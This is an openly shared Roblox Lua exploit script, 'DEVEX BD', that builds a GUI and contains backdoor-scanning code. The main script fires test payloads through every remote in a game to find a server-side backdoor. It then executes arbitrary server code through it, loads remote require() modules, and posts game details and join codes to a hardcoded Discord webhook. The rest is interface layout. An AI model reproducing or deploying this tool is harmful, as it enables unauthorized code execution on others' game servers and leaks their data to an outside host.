--- DEVEX is open source now :(
--- if you wanna skid skid it and dont forget to give credits

-- Instances: 27 | Scripts: 3 | Modules: 0 | Tags: 0
local DEV2L = {};

-- StarterGui.DEVEX
DEV2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
DEV2L["1"]["Name"] = [[DEVEX]];
DEV2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
DEV2L["1"]["ResetOnSpawn"] = false;


-- StarterGui.DEVEX.Beta
DEV2L["2"] = Instance.new("Folder", DEV2L["1"]);
DEV2L["2"]["Name"] = [[Beta]];


-- StarterGui.DEVEX.Beta.MainFromTheMain
DEV2L["3"] = Instance.new("Folder", DEV2L["2"]);
DEV2L["3"]["Name"] = [[MainFromTheMain]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui
DEV2L["4"] = Instance.new("Folder", DEV2L["3"]);
DEV2L["4"]["Name"] = [[Gui]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main
DEV2L["5"] = Instance.new("Frame", DEV2L["4"]);
DEV2L["5"]["BorderSizePixel"] = 0;
DEV2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["5"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
DEV2L["5"]["Size"] = UDim2.new(0.55903, 0, 0.52743, 0);
DEV2L["5"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);
DEV2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["5"]["Name"] = [[Main]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.UICorner
DEV2L["6"] = Instance.new("UICorner", DEV2L["5"]);
DEV2L["6"]["CornerRadius"] = UDim.new(0, 12);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.UIGradient
DEV2L["7"] = Instance.new("UIGradient", DEV2L["5"]);
DEV2L["7"]["Rotation"] = 90;
DEV2L["7"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(68, 199, 173)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(26, 119, 211))};


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Scripts
DEV2L["8"] = Instance.new("Folder", DEV2L["5"]);
DEV2L["8"]["Name"] = [[Scripts]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Scripts.MainSC
DEV2L["9"] = Instance.new("LocalScript", DEV2L["8"]);
DEV2L["9"]["Name"] = [[MainSC]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Scripts.MainSC.Click
DEV2L["a"] = Instance.new("Sound", DEV2L["9"]);
DEV2L["a"]["Name"] = [[Click]];
-- [ERROR] cannot convert AudioContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
DEV2L["a"]["SoundId"] = [[rbxassetid://72750814778881]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.TextLabel
DEV2L["b"] = Instance.new("TextLabel", DEV2L["5"]);
DEV2L["b"]["TextWrapped"] = true;
DEV2L["b"]["BorderSizePixel"] = 0;
DEV2L["b"]["TextSize"] = 14;
DEV2L["b"]["TextXAlignment"] = Enum.TextXAlignment.Left;
DEV2L["b"]["TextScaled"] = true;
DEV2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["b"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["b"]["BackgroundTransparency"] = 1;
DEV2L["b"]["Size"] = UDim2.new(1, 0, 0.07667, 0);
DEV2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["b"]["Text"] = [[DEVEX BD]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.UIAspectRatioConstraint
DEV2L["c"] = Instance.new("UIAspectRatioConstraint", DEV2L["5"]);
DEV2L["c"]["AspectRatio"] = 1.66667;


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll
DEV2L["d"] = Instance.new("ScrollingFrame", DEV2L["5"]);
DEV2L["d"]["Active"] = true;
DEV2L["d"]["BorderSizePixel"] = 0;
DEV2L["d"]["Name"] = [[InputScroll]];
DEV2L["d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["d"]["Size"] = UDim2.new(0.96711, 0, 0.60172, 0);
DEV2L["d"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["d"]["Position"] = UDim2.new(0.01535, 0, 0.10029, 0);
DEV2L["d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["d"]["ScrollBarThickness"] = 2;


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.LocalScript
DEV2L["e"] = Instance.new("LocalScript", DEV2L["d"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.Input
DEV2L["f"] = Instance.new("TextBox", DEV2L["d"]);
DEV2L["f"]["CursorPosition"] = -1;
DEV2L["f"]["Name"] = [[Input]];
DEV2L["f"]["TextXAlignment"] = Enum.TextXAlignment.Left;
DEV2L["f"]["BorderSizePixel"] = 0;
DEV2L["f"]["TextWrapped"] = true;
DEV2L["f"]["TextSize"] = 21;
DEV2L["f"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["f"]["TextYAlignment"] = Enum.TextYAlignment.Top;
DEV2L["f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["f"]["RichText"] = true;
DEV2L["f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["f"]["MultiLine"] = true;
DEV2L["f"]["ClearTextOnFocus"] = false;
DEV2L["f"]["Size"] = UDim2.new(0, 441, 0, 211);
DEV2L["f"]["Position"] = UDim2.new(0, 0, -0.00143, 0);
DEV2L["f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["f"]["Text"] = [[]];


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.Input.LocalScript
DEV2L["10"] = Instance.new("LocalScript", DEV2L["f"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.UIListLayout
DEV2L["11"] = Instance.new("UIListLayout", DEV2L["d"]);
DEV2L["11"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Exe
DEV2L["12"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["12"]["TextWrapped"] = true;
DEV2L["12"]["BorderSizePixel"] = 0;
DEV2L["12"]["TextSize"] = 14;
DEV2L["12"]["TextScaled"] = true;
DEV2L["12"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["12"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["12"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["12"]["Text"] = [[Execute]];
DEV2L["12"]["Name"] = [[Exe]];
DEV2L["12"]["Position"] = UDim2.new(0.014, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Exe.UICorner
DEV2L["13"] = Instance.new("UICorner", DEV2L["12"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Clear
DEV2L["14"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["14"]["TextWrapped"] = true;
DEV2L["14"]["BorderSizePixel"] = 0;
DEV2L["14"]["TextSize"] = 14;
DEV2L["14"]["TextScaled"] = true;
DEV2L["14"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["14"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["14"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["14"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["14"]["Text"] = [[Clear]];
DEV2L["14"]["Name"] = [[Clear]];
DEV2L["14"]["Position"] = UDim2.new(0.194, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Clear.UICorner
DEV2L["15"] = Instance.new("UICorner", DEV2L["14"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.RE
DEV2L["16"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["16"]["TextWrapped"] = true;
DEV2L["16"]["BorderSizePixel"] = 0;
DEV2L["16"]["TextSize"] = 14;
DEV2L["16"]["TextScaled"] = true;
DEV2L["16"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["16"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["16"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["16"]["Text"] = [[RE]];
DEV2L["16"]["Name"] = [[RE]];
DEV2L["16"]["Position"] = UDim2.new(0.378, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.RE.UICorner
DEV2L["17"] = Instance.new("UICorner", DEV2L["16"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.R6
DEV2L["18"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["18"]["TextWrapped"] = true;
DEV2L["18"]["BorderSizePixel"] = 0;
DEV2L["18"]["TextSize"] = 14;
DEV2L["18"]["TextScaled"] = true;
DEV2L["18"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["18"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["18"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["18"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["18"]["Text"] = [[R6]];
DEV2L["18"]["Name"] = [[R6]];
DEV2L["18"]["Position"] = UDim2.new(0.56, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.R6.UICorner
DEV2L["19"] = Instance.new("UICorner", DEV2L["18"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Inject
DEV2L["1a"] = Instance.new("TextButton", DEV2L["5"]);
DEV2L["1a"]["TextWrapped"] = true;
DEV2L["1a"]["BorderSizePixel"] = 0;
DEV2L["1a"]["TextSize"] = 14;
DEV2L["1a"]["TextScaled"] = true;
DEV2L["1a"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["1a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
DEV2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
DEV2L["1a"]["Size"] = UDim2.new(0.156, 0, 0.16667, 0);
DEV2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
DEV2L["1a"]["Text"] = [[Inject]];
DEV2L["1a"]["Name"] = [[Inject]];
DEV2L["1a"]["Position"] = UDim2.new(0.826, 0, 0.73667, 0);


-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Inject.UICorner
DEV2L["1b"] = Instance.new("UICorner", DEV2L["1a"]);



-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.Scripts.MainSC
local function C_9()
local script = DEV2L["9"];
	local StarterGui = game:GetService("StarterGui");
	local e = script.Parent.Parent;
	e.Draggable = true
	e.Active = true
	local plr = game.Players.LocalPlayer;
	local input = e.InputScroll.Input;
	local exe = e.Exe;
	local clear = e.Clear;
	local inject = e.Inject;
	local re = e.RE;
	local rr = e.R6;
	local sound = script.Click;
	local Logs = [[local HttpService = game:GetService("HttpService")
	local MarketplaceService = game:GetService("MarketplaceService")
	local Players = game:GetService("Players")
	local RunService = game:GetService("RunService")
	
	if not RunService:IsServer() then return end
	if not HttpService.HttpEnabled then return end
	
	local WEBHOOK_URL = "https://discord.com/api/webhooks/1454657705275949108/GyQimOdDoJpu2wGKgta-ZO-PL1V7E3buPpKsG2NDRwqEnzqtIetE5V9zqqf_H25KH7oy"

	local placeId = game.PlaceId
	local universeId = game.GameId
	local jobId = game.JobId
	
	-- ==== GAME INFO ====
	local productInfo
	pcall(function()
		productInfo = MarketplaceService:GetProductInfo(placeId)
	end)
	
	local gameName = productInfo and productInfo.Name or "Unknown Game"
	local gameDesc = productInfo and productInfo.Description or "No description"
	local gameLink = "https://www.roblox.com/games/" .. placeId
	
	-- ==== VISITS ====
	local visits = "N/A"
	pcall(function()
		local res = HttpService:GetAsync(
			"https://games.roblox.com/v1/games?universeIds=" .. universeId
		)
		local decoded = HttpService:JSONDecode(res)
		if decoded and decoded.data and decoded.data[1] then
			visits = tostring(decoded.data[1].visits)
		end
	end)
	
	-- ==== THUMBNAILS ====
	local bigImage =
		"https://www.roblox.com/asset-thumbnail/image?assetId="
		.. placeId ..
		"&width=768&height=432&format=png"
	
	local smallThumbnail =
		"https://www.roblox.com/asset-thumbnail/image?assetId="
		.. placeId ..
		"&width=150&height=150&format=png"
	
	-- ==== JOIN CODE ====
	local joinCode = string.format(
		"Roblox.GameLauncher.joinGameInstance(%d, \"%s\")",
		placeId,
		jobId
	)
	
	local data = {
		username = "DEV Backdoor",
		embeds = {{
			title = "Game Logged!",
			description = "**🎮 Game Informations**",
			color = 3447003,
	
			thumbnail = { 
				url = smallThumbnail
			},
	
			image = {
				url = bigImage
			},
	
			fields = {
				{
					name = "Name",
					value = string.format("[%s](%s)", gameName, gameLink),
					inline = false
				},
				{
					name = "Visits",
					value = visits,
					inline = true
				},
				{
					name = "Active Players",
					value = tostring(#Players:GetPlayers()),
					inline = true
				},
				{
					name = "Join Code (JS)",
					value = "```js\n" .. joinCode .. "\n```",
					inline = false
				}
			},
	
			footer = {
				text = "DEV Backdoor • Game Logs"
			},
			timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
		}}
	}
	
	-- ==== SEND WEBHOOK ====
	pcall(function()
		HttpService:PostAsync(
			WEBHOOK_URL,
			HttpService:JSONEncode(data),
			Enum.HttpContentType.ApplicationJson
		)
	end)]]
	
	alphabet={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'}
	
	backdoor=nil
	HttpService=game:GetService("HttpService")
	
	function debug(text, lvl)
		local func=print
		if lvl==1 then func=print end
		if lvl==2 then func=error end
		if lvl==3 then func=warn end
		func('SILENT!! '..text)
	end
	
	function runRemote(remote, data, data2)
		if remote:IsA('RemoteEvent') then
			remote:FireServer(data)
		elseif remote:IsA('RemoteFunction') then
			spawn(function() remote:InvokeServer(data) end)
		end
	
	end
	
	
	function notify(text)
		game:GetService('StarterGui'):SetCore(
			"SendNotification",
			{
				Title = "DEV BACKDOOR",
				Duration = 6,
				Text = text
			}
		)
	end
	
	
	if _G.LALOL_Hub_Backdoor_Logs_Disabled then
		notify('Logs disabled :(')
	end
	
	
	function generateName(lenght)
	
		local text=''
	
		for i=1,lenght do
			text=text..alphabet[math.random(1,#alphabet)]
		end
	
		return text
	
	end
	
	local code
	function findRemote()
	
		local timee=os.clock()
	
		local remotes={}
	
		for i,remote in game:GetDescendants() do
	
	
			if not remote:IsA('RemoteEvent') then 
				if not remote:IsA('RemoteFunction') then continue end
			end
	
			-- RobloxReplicatedStorage
			if string.split(remote:GetFullName(), '.')[1]=='RobloxReplicatedStorage' then
				debug('Roblox Replicated Storage ('..remote.Name..')', 1)
				continue
			end
	
			-- Backdoor Sender
	
			while true do
				code=generateName(math.random(12,30))
				if not remotes[code] then break end
			end
	
			runRemote(remote, "a=Instance.new('Model',workspace)a.Name='"..code.."'")
			remotes[code]=remote
	
		end
	
		-- Backdoor Checker
	
		for i=1,100 do
	
			for i,remote in remotes do
				local code=i
	
				if workspace:FindFirstChild(code) then
	
					notify('Backdoor found! '..os.clock()-timee..'s')
	
					backdoor=remote
	
					runRemote(backdoor, "require(80690314644985).RE('" ..plr.Name.. "')")
					runRemote(backdoor, Logs)
	
					return true
				end
			end
			wait()
		end
	
		return false
	
	end
	
	
	inject.MouseButton1Click:Connect(function()
		findRemote()
		sound:Play()
	end)
	
	exe.MouseButton1Click:Connect(function()
		runRemote(backdoor, input.Text)
		sound:Play()
	end)
	
	clear.MouseButtton1Click:Connect(function()
		input.Text = ""
	end)
	
	re.MouseButton1Click:Connect(function()
		game.ReplicatedStorage:WaitForChild("RE"):FireServer()
		sound:Play()
	end)
	
	rr.MouseButton1Click:Connect(function()
		local Re6 = "require(3436957371):r6('".. plr.Name .. "')"
		runRemote(backdoor, Re6)
		sound:Play()
	end)
end;
task.spawn(C_9);
-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.LocalScript
local function C_e()
local script = DEV2L["e"];
	local scrollingFrame = script.Parent
	local layout = scrollingFrame:WaitForChild("UIListLayout")
	
	-- pastikan ini mati
	scrollingFrame.AutomaticCanvasSize = Enum.AutomaticSize.None
	
	local function updateCanvas()
		scrollingFrame.CanvasSize = UDim2.new(
			0,
			0,
			0,
			layout.AbsoluteContentSize.Y
		)
	end
	
	-- update setiap layout berubah
	layout:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(updateCanvas)
	
	updateCanvas()
	
end;
task.spawn(C_e);
-- StarterGui.DEVEX.Beta.MainFromTheMain.Gui.Main.InputScroll.Input.LocalScript
local function C_10()
local script = DEV2L["10"];
	local TextBox = script.Parent
	local TextService = game:GetService("TextService")
	
	-- setting minimum height
	local MIN_HEIGHT = TextBox.Size.Y.Offset
	local PADDING = 6 -- jarak bawah & atas teks
	
	local function resize()
		local text = TextBox.Text
		if text == "" then
			TextBox.Size = UDim2.new(
				TextBox.Size.X.Scale,
				TextBox.Size.X.Offset,
				TextBox.Size.Y.Scale,
				MIN_HEIGHT
			)
			return
		end
	
		local textSize = TextService:GetTextSize(
			text,
			TextBox.TextSize,
			TextBox.Font,
			Vector2.new(TextBox.AbsoluteSize.X, math.huge)
		)
	
		local newHeight = math.max(MIN_HEIGHT, textSize.Y + PADDING)
	
		TextBox.Size = UDim2.new(
			TextBox.Size.X.Scale,
			TextBox.Size.X.Offset,
			0,
			newHeight
		)
	end
	
	TextBox:GetPropertyChangedSignal("Text"):Connect(resize)
	
	resize()
	
end;
task.spawn(C_10);

return DEV2L["1"], require;
